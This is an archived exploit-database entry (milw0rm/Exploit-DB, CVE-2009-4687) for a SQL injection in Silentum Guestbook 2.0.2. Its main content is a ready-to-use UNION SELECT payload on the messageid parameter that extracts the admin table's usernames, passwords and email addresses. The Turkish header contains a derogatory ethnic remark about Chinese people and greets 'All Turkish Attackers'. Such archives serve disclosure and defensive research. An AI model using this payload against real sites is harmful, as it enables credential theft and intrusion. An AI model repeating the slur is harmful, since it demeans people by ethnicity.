Silentum Guestbook 2.0.2 (silentum_guestbook.php) SQL Injection Vuln



EDB-ID: 9202 CVE: 2009-4687 OSVDB-ID: 62883
Author: Bgh7 Published: 2009-07-20 Verified: Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
##Silentum Guestbook v2.0.2 (silentum_guestbook.php) Sql Injection Vuln.
#######################################################################
#######################################################################
##Yazar: Bgh7
##
##Turk Bilisim Gucleri Group / Ihlilal Hatti
##
##ByBgh7[a]msn.com
##
##Http://Bgh7.Blogspot.Com
##
##Bug: Sql Injection
##
##Ä°ndir/Download: http://hypersilence.net/silentum_guestbook.php
##
##Biz ki neler gördük, biz ki neler çektik... 2-3 Çekik gözlüden mi korkacağız ?
##Çin sömürecek bir rezerv daha bulduğunu sanıyor, yazık...
#######################################################################
#######################################################################
Sql: silentum_guestbook.php?messageid=-1 UNION ALL SELECT 0,0,0,0,concat(u_name,0x3a,u_password,0x3a,u_email),0,0 FROM silentum_admin/**
#######################################################################
#######################################################################
Thanks: m3rcil3sS & GhostKing & milw0rm & All Turkısh Attackers

# milw0rm.com [2009-07-20]